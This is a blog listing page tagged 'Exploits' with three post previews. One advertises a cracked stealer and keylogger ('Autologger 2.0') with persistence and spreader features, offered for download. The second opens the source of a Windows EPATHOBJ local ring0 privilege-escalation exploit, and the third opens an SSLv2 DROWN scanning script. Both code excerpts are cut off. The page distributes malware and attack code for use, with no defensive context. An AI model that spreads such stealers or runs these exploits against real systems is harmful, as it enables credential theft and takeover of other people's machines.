Posts

Showing posts with the label Exploits

Leak Autologger 2.0 Cracked | Persistence | Spreaders | Stealer | Antis | Best Keylogger

Image
Download

Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit

#ifndef WIN32_NO_STATUS # define WIN32_NO_STATUS #endif #include <stdio.h> #include <stdarg.h> #include <stddef.h> #include <windows.h> #include <assert.h> #ifdef WIN32_NO_STATUS # undef WIN32_NO_STATUS #endif #include <ntstatus.h> #pragma comment(lib, "gdi32") #pragma comment(lib, "kernel32") #pragma comment(lib, "user32") #pragma comment(lib, "shell32") #pragma comment(linker, "/SECTION:.text,ERW") #ifndef PAGE_SIZE # define PAGE_SIZE 0x1000 #endif #define MAX_POLYPOINTS (8192 * 3) #define MAX_REGIONS 8192 #define CYCLE_TIMEOUT 10000 // // -------------------------------------------------- // Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit // ----------------------------------------- taviso () cmpxchg8b com ----- // // INTRODUCTION // // There's a pretty obvious bug in win32k!EPATHOBJ::pprFlattenRec where the // PATHREC object returned by win32k!EPATHOBJ::newpathrec doesn't i...

SSLv2 Drown Attack Scan

#!/usr/bin/env python import sys from enum import Enum import time import datetime import socket import Crypto.Cipher import signal from binascii import hexlify import base64 #!/usr/bin/env python import sys from enum import Enum import time import datetime import socket import Crypto.Cipher import signal from binascii import hexlify import base64 sys.path.append("./scapy-ssl_tls/") import logging logging.getLogger("scapy.runtime").setLevel(logging.ERROR) import scapy from scapy.all import * from ssl_tls import * import ssl_tls_crypto from pyx509.pkcs7.asn1_models.X509_certificate import Certificate from pyx509.pkcs7_models import X509Certificate, PublicKeyInfo, ExtendedKeyUsageExt from pyx509.pkcs7.asn1_models.decoder_workarounds import decode import select SOCKET_TIMEOUT = 15 SOCKET_RECV_SIZE = 80 * 1024 CON_FAIL = "con fail" NO_STARTTLS = "no starttls" NO_TLS = "no tls" VULN = "vuln" def timeout(func, args=(), kwargs={}, ti...